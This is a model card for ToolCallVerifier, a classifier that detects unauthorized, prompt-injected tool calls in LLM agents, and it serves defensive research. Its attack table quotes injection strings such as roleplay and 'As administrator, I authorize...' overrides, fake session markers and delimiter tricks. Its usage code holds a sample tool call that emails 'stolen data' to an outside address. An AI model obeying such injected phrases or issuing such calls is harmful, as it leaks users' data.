ToolCallVerifier - Unauthorized Tool Call Detection

Stage 2 of Two-Stage LLM Agent Defense Pipeline
🎯 What This Model Does
ToolCallVerifier is a ModernBERT-based token classifier that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.
| Label | Description |
|---|---|
| AUTHORIZED | Token is part of a legitimate, user-requested action |
| UNAUTHORIZED | Token indicates injected or malicious content: BLOCK |
📊 Performance
| Metric | Value |
|---|---|
| UNAUTHORIZED F1 | 93.50% |
| UNAUTHORIZED Precision | 95.01% |
| UNAUTHORIZED Recall | 92.05% |
| Overall Accuracy | 92.88% |
Confusion Matrix (Token-Level)
| | Predicted AUTH | Predicted UNAUTH |
|---|---|---|
| Actual AUTH | 130,708 | 8,483 |
| Actual UNAUTH | 13,924 | 161,031 |
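As a sanity check, the headline metrics can be recomputed from the confusion matrix above. The sketch below treats UNAUTHORIZED as the positive class; the variable names are illustrative and not taken from the original evaluation code. The recomputed values agree with the reported table to within a few hundredths of a percentage point.

```python
# Token-level counts copied from the confusion matrix above.
# UNAUTHORIZED is treated as the positive class.
tn, fp = 130_708, 8_483    # actual AUTHORIZED row
fn, tp = 13_924, 161_031   # actual UNAUTHORIZED row

precision = tp / (tp + fp)                       # flagged tokens that were truly unauthorized
recall = tp / (tp + fn)                          # unauthorized tokens that were flagged
f1 = 2 * precision * recall / (precision + recall)
accuracy = (tp + tn) / (tp + tn + fp + fn)

for name, value in [("precision", precision), ("recall", recall),
                    ("f1", f1), ("accuracy", accuracy)]:
    print(f"{name}: {value:.2%}")
```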
🗂️ Training Data
Trained on ~30,000 samples combining real-world attacks and synthetic patterns:
HuggingFace Datasets
Synthetic Attack Generators
| Generator | Description |
|---|---|
| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
| Filesystem | File/directory operation attacks |
| Network | Network/API exfiltration attacks |
| Email | Email tool hijacking |
| Financial | Transaction manipulation |
| Code Execution | Code injection attacks |
| Authentication | Access control bypass |
| MCP Attacks | Tool poisoning, shadowing, rug pulls |
🚨 Attack Categories Covered
| Category | Source | Description |
|---|---|---|
| Delimiter Injection | LLMail | `<<end_context>>`, `>>}}]])` |
| Word Obfuscation | LLMail | Inserting noise words between tokens |
| Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` |
| Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
| XML Tag Injection | WildJailbreak | `<execute_action>`, `<tool_call>` |
| Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
| Intent Mismatch | Synthetic | User asks X, tool does Y |
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
| MCP Shadowing | Synthetic | Fake authorization context |
💻 Usage
from transformers import AutoTokenizer, AutoModelForTokenClassification
import torch

# Load the tokenizer and the token-classification model from the Hub
model_name = "rootfs/tool-call-verifier"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForTokenClassification.from_pretrained(model_name)

# The user's request and the tool call the agent is about to execute
user_intent = "Summarize my emails"
tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'

# Combine both into the single input string the model expects
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)

# Run inference without tracking gradients
with torch.no_grad():
    outputs = model(**inputs)
    predictions = torch.argmax(outputs.logits, dim=-1)

# Map per-token class ids to label names
id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
labels = [id2label[p.item()] for p in predictions[0]]

# Block the call if any token is flagged as UNAUTHORIZED
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
if unauthorized_tokens:
    print("⚠️ BLOCKED: Unauthorized tool call detected!")
    print(f"   Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
else:
    print("✅ Tool call authorized")
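Raw subword tokens can be hard to read in logs. One option is to map flagged tokens back to character ranges of the input string. The sketch below is an illustration, not part of the released code: `flagged_spans` is a hypothetical helper, and it assumes the offsets come from a fast tokenizer called with `return_offsets_mapping=True`, where special tokens carry a zero-width `(0, 0)` offset. The demo uses hand-written offsets so it runs without downloading the model.

```python
from typing import List, Sequence, Tuple


def flagged_spans(
    text: str,
    offsets: Sequence[Tuple[int, int]],
    labels: Sequence[str],
    flag: str = "UNAUTHORIZED",
) -> List[str]:
    """Merge neighbouring flagged tokens into contiguous substrings of `text`."""
    spans: List[List[int]] = []
    for (start, end), label in zip(offsets, labels):
        # Skip clean tokens and zero-width entries such as special tokens.
        if label != flag or start == end:
            continue
        # Extend the previous span if this token touches it or is separated
        # from it by a single character (typically a space).
        if spans and start <= spans[-1][1] + 1:
            spans[-1][1] = max(spans[-1][1], end)
        else:
            spans.append([start, end])
    return [text[s:e] for s, e in spans]


# Toy example with hand-written offsets (not real tokenizer output).
text = "send to evil now"
offsets = [(0, 0), (0, 4), (5, 7), (8, 12), (13, 16), (0, 0)]
labels = ["AUTHORIZED", "AUTHORIZED", "UNAUTHORIZED",
          "UNAUTHORIZED", "AUTHORIZED", "AUTHORIZED"]
print(flagged_spans(text, offsets, labels))  # ['to evil']
```

With the real model, `offsets` would be `inputs["offset_mapping"][0].tolist()` from a tokenizer call that requests offsets, and that key would need to be removed from `inputs` before calling `model(**inputs)`.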
⚙️ Training Configuration
| Parameter | Value |
|---|---|
| Base Model | answerdotai/ModernBERT-base |
| Max Length | 512 tokens |
| Batch Size | 32 |
| Epochs | 5 |
| Learning Rate | 3e-5 |
| Loss | CrossEntropyLoss (class-weighted) |
| Class Weights | [0.5, 3.0] (AUTHORIZED, UNAUTHORIZED) |
| Attention | SDPA (Flash Attention) |
| Hardware | AMD Instinct MI300X (ROCm) |
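To illustrate what the class weights do, here is a dependency-free sketch of a class-weighted cross-entropy over per-token logits. The training script is not shown in this card, so how the weights enter the loss is an assumption: the sketch uses the weighted-mean reduction that `torch.nn.CrossEntropyLoss(weight=...)` applies by default, and `weighted_cross_entropy` is a hypothetical name.

```python
import math
from typing import Sequence

CLASS_WEIGHTS = [0.5, 3.0]  # (AUTHORIZED, UNAUTHORIZED), from the table above


def weighted_cross_entropy(
    logits: Sequence[Sequence[float]],
    targets: Sequence[int],
    weights: Sequence[float] = CLASS_WEIGHTS,
) -> float:
    """Weighted mean of per-token negative log-likelihoods."""
    total, weight_sum = 0.0, 0.0
    for row, target in zip(logits, targets):
        # Numerically stable log-sum-exp over the class logits.
        m = max(row)
        log_z = m + math.log(sum(math.exp(x - m) for x in row))
        nll = log_z - row[target]
        total += weights[target] * nll
        weight_sum += weights[target]
    return total / weight_sum


# Two tokens, both predicted AUTHORIZED; the second is actually UNAUTHORIZED.
logits = [[2.0, 0.0], [2.0, 0.0]]
targets = [0, 1]
weighted = weighted_cross_entropy(logits, targets)
unweighted = weighted_cross_entropy(logits, targets, weights=[1.0, 1.0])
print(f"weighted={weighted:.4f} unweighted={unweighted:.4f}")
```

Because the missed UNAUTHORIZED token carries weight 3.0 against 0.5 for the correct AUTHORIZED token, the weighted loss comes out higher than the unweighted mean, which pushes training toward catching unauthorized tokens.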
🔗 Integration with FunctionCallSentinel
This model is Stage 2 of a two-stage defense pipeline:
┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
│   User Prompt   │────▶│ FunctionCallSentinel │────▶│   LLM + Tools   │
│                 │     │      (Stage 1)       │     │                 │
└─────────────────┘     └──────────────────────┘     └────────┬────────┘
                                                              │
                               ┌──────────────────────────────▼──────────────────────────┐
                               │              ToolCallVerifier (This Model)              │
                               │     Token-level verification before tool execution      │
                               └─────────────────────────────────────────────────────────┘
| Scenario | Recommendation |
|---|---|
| General chatbot | Stage 1 only |
| Tool-calling agent (low risk) | Stage 1 only |
| Tool-calling agent (high risk) | Both stages |
| Email/file system access | Both stages |
| Financial transactions | Both stages |
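The recommendations above can be expressed as a small gating function. This is a minimal sketch under stated assumptions: `build_verifier_input` and `allow_tool_call` are hypothetical helpers, the two stages are passed in as plain callables that return `True` when the input looks safe, and the real pipeline runs Stage 1 before the LLM produces a tool call rather than in a single function.

```python
import json
from typing import Callable


def build_verifier_input(user_intent: str, name: str, arguments: dict) -> str:
    """Format the Stage 2 input as '[USER] <intent> [TOOL] <tool call JSON>'."""
    tool_call = json.dumps({"name": name, "arguments": arguments})
    return f"[USER] {user_intent} [TOOL] {tool_call}"


def allow_tool_call(
    user_intent: str,
    name: str,
    arguments: dict,
    prompt_is_safe: Callable[[str], bool],      # stand-in for Stage 1
    call_is_authorized: Callable[[str], bool],  # stand-in for Stage 2
    high_risk: bool,
) -> bool:
    """Return True only if every stage required for this risk level passes."""
    if not prompt_is_safe(user_intent):
        return False
    if not high_risk:
        return True  # low-risk deployments stop after Stage 1
    return call_is_authorized(build_verifier_input(user_intent, name, arguments))


# Stub stages for demonstration only; real ones would call the two models.
stage1 = lambda prompt: True
stage2 = lambda text: '"send_email"' not in text

print(allow_tool_call("Summarize my emails", "send_email", {"to": "a"},
                      stage1, stage2, high_risk=True))
```

Passing the stages as callables keeps the gate independent of how each model is loaded or served.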
🎯 Intended Use
Primary Use Cases
- LLM Agent Security: Verify tool calls before execution
- Prompt Injection Defense: Detect unauthorized actions from injected prompts
- API Gateway Protection: Filter malicious tool calls at infrastructure level
Out of Scope
- General text classification
- Non-tool-calling scenarios
- Languages other than English
⚠️ Limitations
- Tool schema dependent — Best performance when tool schema is included in input
- English only — Not tested on other languages
- Binary classification — No "suspicious" intermediate category (by design, for decisiveness)
📜 License
Apache 2.0
🔗 Links